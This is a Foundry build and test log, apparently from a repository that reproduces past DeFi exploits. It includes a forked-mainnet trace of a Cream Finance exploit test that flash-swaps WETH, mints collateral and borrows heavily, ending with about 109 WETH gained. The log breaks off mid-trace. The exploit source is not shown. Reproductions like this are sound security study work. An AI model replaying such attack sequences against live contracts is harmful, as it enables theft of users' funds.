Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.26s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:49:28:
   |
49 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                            ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:49:44:
   |
49 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                            ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:49:61:
   |
49 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                             ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:49:78:
   |
49 |     function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) external {
   |                                                                              ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:65:9:
   |
65 |         bytes4 functionSig,
   |         ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:66:9:
   |
66 |         bytes32 partition,
   |         ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:67:9:
   |
67 |         address operator,
   |         ^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:68:9:
   |
68 |         address from,
   |         ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:69:9:
   |
69 |         address to,
   |         ^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:70:9:
   |
70 |         uint256 value,
   |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:71:9:
   |
71 |         bytes calldata data,
   |         ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2021-08/Cream_exp.sol:72:9:
   |
72 |         bytes calldata operatorData
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 476.12ms (1.74ms CPU time)

Ran 1 test for src/test/2021-08/Cream_exp.sol:ContractTest
[PASS] test() (gas: 1018595)
Logs:
  Exploit completed, WETH Balance: 109168087922212625919

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 13125070 [1.312e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1160395] ContractTest::test()
    ├─ [0] 0x0000000000000000000000000000000000000000::fallback{value: 79228162514264337593543950335}()
    │   └─ ← [Stop]
    ├─ [27371] 0x1820a4B7618BdE71Dce8cdc73aAB6C95905faD24::setInterfaceImplementer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xfa352d6368bbc643bcf9d528ffaba5dd3e826137bc42f935045c6c227bd4c72a, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ emit InterfaceImplementerSet(addr: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], interfaceHash: 0xfa352d6368bbc643bcf9d528ffaba5dd3e826137bc42f935045c6c227bd4c72a, implementer: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 0x5f26d313be4d4d4274696a0d96469f83ce337f3d67c7361eca52929486ca33f2: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   └─ ← [Stop]
    ├─ [1086359] 0xd3d2E2692501A5c9Ca623199D38826e513033a17::swap(0, 500000000000000000000 [5e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x30783030)
    │   ├─ [29962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000 [5e20])
    │   │   ├─ emit Transfer(from: 0xd3d2E2692501A5c9Ca623199D38826e513033a17, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 500000000000000000000 [5e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000
    │   │   │   @ 0xc0e75612d35d156c6027aa01afe2ad7d80853c95e612a023a4992c7cbe19ff21: 0x00000000000000000000000000000000000000000000037d1216250ff1d39b1d → 0x000000000000000000000000000000000000000000000361f7314e2d02839b1d
    │   │   └─ ← [Return] true
    │   ├─ [1014178] ContractTest::uniswapV2Call(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 500000000000000000000 [5e20], 0x30783030)
    │   │   ├─ [9195] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(500000000000000000000 [5e20])
    │   │   │   ├─ [55] ContractTest::receive{value: 500000000000000000000}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 500000000000000000000 [5e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000001b1ae4d6e2ef500000 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [102468] 0xD06527D5e56A3495252A528C4987003b712860eE::mint{value: 500000000000000000000}()
    │   │   │   ├─ [9892] 0x812C0b2a2A0A74f6f6ed620Fbd2B67Fec7DB2190::getBorrowRate(1824106833908118122752 [1.824e21], 4625435318087959774131 [4.625e21], 3462470277093771192 [3.462e18]) [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000beb7f4033
    │   │   │   ├─ emit AccrueInterest(cashPrior: 1824106833908118122752 [1.824e21], interestAccumulated: 4025634925236722 [4.025e15], borrowIndex: 1114434931648800682 [1.114e18], totalBorrows: 4625439343722885010853 [4.625e21])
    │   │   │   ├─ [12222] 0x3d5BC3c8d13dcB8bF317092d84783c2697AE9258::mintAllowed(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000 [5e20])
    │   │   │   │   ├─ [7042] 0x02E795EEc131246128346D17d2f564D7bF7C705b::mintAllowed(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000 [5e20]) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ emit Mint(minter: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], mintAmount: 500000000000000000000 [5e20], mintTokens: 2417223613775 [2.417e12])
    │   │   │   ├─ emit Transfer(from: 0xD06527D5e56A3495252A528C4987003b712860eE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2417223613775 [2.417e12])
    │   │   │   ├─ [1016] 0x3d5BC3c8d13dcB8bF317092d84783c2697AE9258::mintVerify(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000 [5e20], 2417223613775 [2.417e12])
    │   │   │   │   ├─ [403] 0x02E795EEc131246128346D17d2f564D7bF7C705b::mintVerify(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000 [5e20], 2417223613775 [2.417e12]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000000c845bd → 0x0000000000000000000000000000000000000000000000000000000000c845ce
    │   │   │   │   @ 10: 0x0000000000000000000000000000000000000000000000000f7743c89e7330a0 → 0x0000000000000000000000000000000000000000000000000f7744aa7236a7aa
    │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000000fabecf5331c2c903b3 → 0x0000000000000000000000000000000000000000000000fabedda07cee7fd5a5
    │   │   │   │   @ 13: 0x00000000000000000000000000000000000000000000000000001c57c23f03e9 → 0x00000000000000000000000000000000000000000000000000001e8a90004138
    │   │   │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 0 → 0x00000000000000000000000000000000000000000000000000000232cdc13d4f
    │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000300d2a5f3f85c7b8 → 0x0000000000000000000000000000000000000000000000003010bdb20a737c34
    │   │   │   └─ ← [Stop]
    │   │   ├─ [158822] 0xD06527D5e56A3495252A528C4987003b712860eE::borrow(1000000000000000000 [1e18])
    │   │   │   ├─ [99791] 0x3d5BC3c8d13dcB8bF317092d84783c2697AE9258::borrowAllowed(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18])
    │   │   │   │   ├─ [99111] 0x02E795EEc131246128346D17d2f564D7bF7C705b::borrowAllowed(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18]) [delegatecall]
    │   │   │   │   │   ├─ emit MarketEntered(rToken: 0xD06527D5e56A3495252A528C4987003b712860eE, account: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [2901] 0x338EEE1F7B89CE6272f302bDC4b952C13b221f1d::getUnderlyingPrice(0xD06527D5e56A3495252A528C4987003b712860eE) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   │   │   ├─ [4752] 0xD06527D5e56A3495252A528C4987003b712860eE::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0, 2417223613775 [2.417e12], 0, 206848881150465064906976491 [2.068e26]
    │   │   │   │   │   ├─ [901] 0x338EEE1F7B89CE6272f302bDC4b952C13b221f1d::getUnderlyingPrice(0xD06527D5e56A3495252A528C4987003b712860eE) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x60c5448f9600c8cfb7b7dd0290d6477ddbc2ca3e268dc1cd0c66139cf9abd0cf: 0 → 0x000000000000000000000000d06527d5e56a3495252a528c4987003b712860ee
    │   │   │   │   │   │   @ 0x545eb7a5f9be021fece779e61a890525d9ebed439349415c59adcb288243e55e: 0 → 1
    │   │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 1
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [55] ContractTest::receive{value: 1000000000000000000}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Borrow(borrower: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], borrowAmount: 1000000000000000000 [1e18], accountBorrows: 1000000000000000000 [1e18], totalBorrows: 4626439343722885010853 [4.626e21])
    │   │   │   ├─ [949] 0x3d5BC3c8d13dcB8bF317092d84783c2697AE9258::borrowVerify(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18])
    │   │   │   │   ├─ [342] 0x02E795EEc131246128346D17d2f564D7bF7C705b::borrowVerify(0xD06527D5e56A3495252A528C4987003b712860eE, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18]) [delegatecall]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2b: 0 → 0x0000000000000000000000000000000000000000000000000f7744aa7236a7aa
    │   │   │   │   @ 0xa20c45dd8a851b8b8653a17982859bee31b444ff681134f34d4fa90171fb1a2a: 0 → 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000
    │   │   │   │   @ 11: 0x0000000000000000000000000000000000000000000000fabedda07cee7fd5a5 → 0x0000000000000000000000000000000000000000000000faccbe573095e3d5a5
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [54973] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::accrueInterest()
    │   │   │   ├─ [49758] 0x3C710B981F5Ef28DA1807ce7ED3F2a28580E0754::accrueInterest() [delegatecall]
    │   │   │   │   ├─ [14965] 0xbadaC56c9aca307079e8B8FC699987AAc89813ee::getBorrowRate(33663858581302237334110531 [3.366e25], 470166088159676190211552469 [4.701e26], 207252914123973988114735 [2.072e23]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000005976e58ebf
    │   │   │   │   ├─ emit AccrueInterest(cashPrior: 33663858581302237334110531 [3.366e25], interestAccumulated: 3251877049031349542425 [3.251e21], borrowIndex: 1019747018623347753 [1.019e18], totalBorrows: 470169340036725221561094894 [4.701e26])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 11: 0x00000000000000000000000000000000000000000184e98ab5e900fba0c5b4d5 → 0x00000000000000000000000000000000000000000184ea3afec513e4d7e252ee
    │   │   │   │   │   @ 10: 0x0000000000000000000000000000000000000000000000000e26d8188fd30d79 → 0x0000000000000000000000000000000000000000000000000e26de82b5ceec29
    │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000002be333f6fac1080ae12f → 0x000000000000000000000000000000000000000000002c3287f39cdd2da48eba
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000000c845bc → 0x0000000000000000000000000000000000000000000000000000000000c845ce
    │   │   │   │   └─ ← [Return] 0
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [464839] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::borrow(19480000000000000000000000 [1.948e25])
    │   │   │   ├─ [464035] 0x3C710B981F5Ef28DA1807ce7ED3F2a28580E0754::borrow(19480000000000000000000000 [1.948e25]) [delegatecall]
    │   │   │   │   ├─ [235994] 0x3d5BC3c8d13dcB8bF317092d84783c2697AE9258::borrowAllowed(0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19480000000000000000000000 [1.948e25])
    │   │   │   │   │   ├─ [235314] 0x02E795EEc131246128346D17d2f564D7bF7C705b::borrowAllowed(0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19480000000000000000000000 [1.948e25]) [delegatecall]
    │   │   │   │   │   │   ├─ [35242] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::registerCollateral(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   ├─ [34425] 0x3C710B981F5Ef28DA1807ce7ED3F2a28580E0754::registerCollateral(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [1380] 0x3d5BC3c8d13dcB8bF317092d84783c2697AE9258::checkMembership(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [706] 0x02E795EEc131246128346D17d2f564D7bF7C705b::checkMembership(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] false
    │   │   │   │   │   │   │   │   │   └─ ← [Return] false
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x21284a7e3d76be98b82878f06f62c3846b9cfd0a98b63099a707264e9650f639: 0 → 1
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit MarketEntered(rToken: 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6, account: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [87817] 0x338EEE1F7B89CE6272f302bDC4b952C13b221f1d::getUnderlyingPrice(0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6) [staticcall]
    │   │   │   │   │   │   │   ├─ [2448] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::underlying() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0xfF20817765cB7f73d4bde2e66e067E58D11095C2
    │   │   │   │   │   │   │   ├─ [18698] 0x47Fb2585D2C56Fe188D0E6ec628a38b74fCeeeDf::latestRoundData(0xfF20817765cB7f73d4bde2e66e067E58D11095C2, 0x0000000000000000000000000000000000000348) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [7410] 0xfAaA7460eD59C12E204349766CE73Cf5202e6aD6::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 7568, 5648000 [5.648e6], 1630302179 [1.63e9], 1630302179 [1.63e9], 7568
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000010000000000001d900000000000000000000000000000000000000000000000000000000000562e8000000000000000000000000000000000000000000000000000000000612c6fe300000000000000000000000000000000000000000000000000000000612c6fe30000000000000000000000000000000000000000000000010000000000001d90
    │   │   │   │   │   │   │   ├─ [2106] 0x47Fb2585D2C56Fe188D0E6ec628a38b74fCeeeDf::decimals(0xfF20817765cB7f73d4bde2e66e067E58D11095C2, 0x0000000000000000000000000000000000000348) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [298] 0xfAaA7460eD59C12E204349766CE73Cf5202e6aD6::decimals() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 8
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000008
    │   │   │   │   │   │   │   ├─ [16698] 0x47Fb2585D2C56Fe188D0E6ec628a38b74fCeeeDf::latestRoundData(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [7410] 0xe5BbBdb2Bb953371841318E1Edfbf727447CeF2E::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 3535, 315731990000000 [3.157e14], 1630295166 [1.63e9], 1630295166 [1.63e9], 3535
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000010000000000000dcf00000000000000000000000000000000000000000000000000011f28151bb18000000000000000000000000000000000000000000000000000000000612c547e00000000000000000000000000000000000000000000000000000000612c547e0000000000000000000000000000000000000000000000010000000000000dcf
    │   │   │   │   │   │   │   ├─ [2106] 0x47Fb2585D2C56Fe188D0E6ec628a38b74fCeeeDf::decimals(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [298] 0xe5BbBdb2Bb953371841318E1Edfbf727447CeF2E::decimals() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000012
    │   │   │   │   │   │   │   ├─ [9664] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   │   │   │   │   │   │   │   ├─ [2381] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   ├─ [341] 0xfF20817765cB7f73d4bde2e66e067E58D11095C2::decimals() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   └─ ← [Return] 17832542795200 [1.783e13]
    │   │   │   │   │   │   ├─ [3427] 0xD06527D5e56A3495252A528C4987003b712860eE::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0, 2417223613775 [2.417e12], 1000000000000000000 [1e18], 206848881150465064906976491 [2.068e26]
    │   │   │   │   │   │   ├─ [901] 0x338EEE1F7B89CE6272f302bDC4b952C13b221f1d::getUnderlyingPrice(0xD06527D5e56A3495252A528C4987003b712860eE) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1000000000000000000 [1e18]
    │   │   │   │   │   │   ├─ [10051] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   ├─ [8548] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [6663] 0x3C710B981F5Ef28DA1807ce7ED3F2a28580E0754::getAccountSnapshot(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 200197219122908640304245949 [2.001e26]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a59968feb3c75c20d52cbd
    │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 200197219122908640304245949 [2.001e26]
    │   │   │   │   │   │   ├─ [26817] 0x338EEE1F7B89CE6272f302bDC4b952C13b221f1d::getUnderlyingPrice(0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6) [staticcall]
    │   │   │   │   │   │   │   ├─ [448] 0x2Db6c82CE72C8d7D770ba1b5F5Ed0b6E075066d6::underlying() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0xfF20817765cB7f73d4bde2e66e067E58D11095C2
    │   │   │   │   │   │   │   ├─ [4198] 0x47Fb2585D2C56Fe188D0E6ec628a38b74fCeeeDf::latestRoundData(0xfF20817765cB7f73d4bde2e66e067E58D11095C2, 0x0000000000000000000000000000000000000348) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [1410] 0xfAaA7460eD59C12E204349766CE73Cf5202e6aD6::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 7568, 5648000 [5.648e6], 1630302179 [1.63e9], 1630302179 [1.63e9], 7568
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000010000000000001d900000000000000000000000000000000000000000000000000000000000562e8000000000000000000000000000000000000000000000000000000000612c6fe300000000000000000000000000000000000000000000000000000000612c6fe30000000000000000000000000000000000000000000000010000000000001d90
    │   │   │   │   │   │   │   ├─ [2106] 0x47Fb2585D2C56Fe188D0E6ec628a38b74fCeeeDf::decimals(0xfF20817765cB7f73d4bde2e66e067E58D11095C2, 0x0000000000000000000000000000000000000348) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [298] 0xfAaA7460eD59C12E204349766CE73Cf5202e6aD6::decimals() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 8
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000008
    │   │   │   │   │   │   │   ├─ [4198] 0x47Fb2585D2C56Fe188D0E6ec628a38b74fCeeeDf::latestRoundData(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [1410] 0xe5BbBdb2Bb953371841318E1Edfbf727447CeF2E::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 3535, 315731990000000 [3.157e14], 1630295166 [1.63e9], 1630295166 [1.63e9], 3535
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000010000000000000dcf00000000000000000000000000000000000000000000000000011f28151bb18000000000000000000000000000000000000000000000000000000000612c547e00000000000000000000000000000000000000000000000000000000612c547e0000000000000000000000000000000000000000000000010000000000000dcf
    │   │   │   │   │   │   │   ├─ [2106] 0x47Fb2585D2C56Fe188D0E6ec628a38b74fCeeeDf::decimals(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [298] 0xe5BbBdb2Bb953371841318E1Edfbf727447CeF2E::decimals() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000012
    │   │   │   │   │   │   │   ├─ [1164] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::decimals() [staticcall]
    │   │   │   │   │   │   │   │   ├─ [381] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   ├─ [341] 0xfF20817765cB7f73d4bde2e66e067E58D11095C2::decimals() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 18
    │   │   │   │   │   │   │   └─ ← [Return] 17832542795200 [1.783e13]
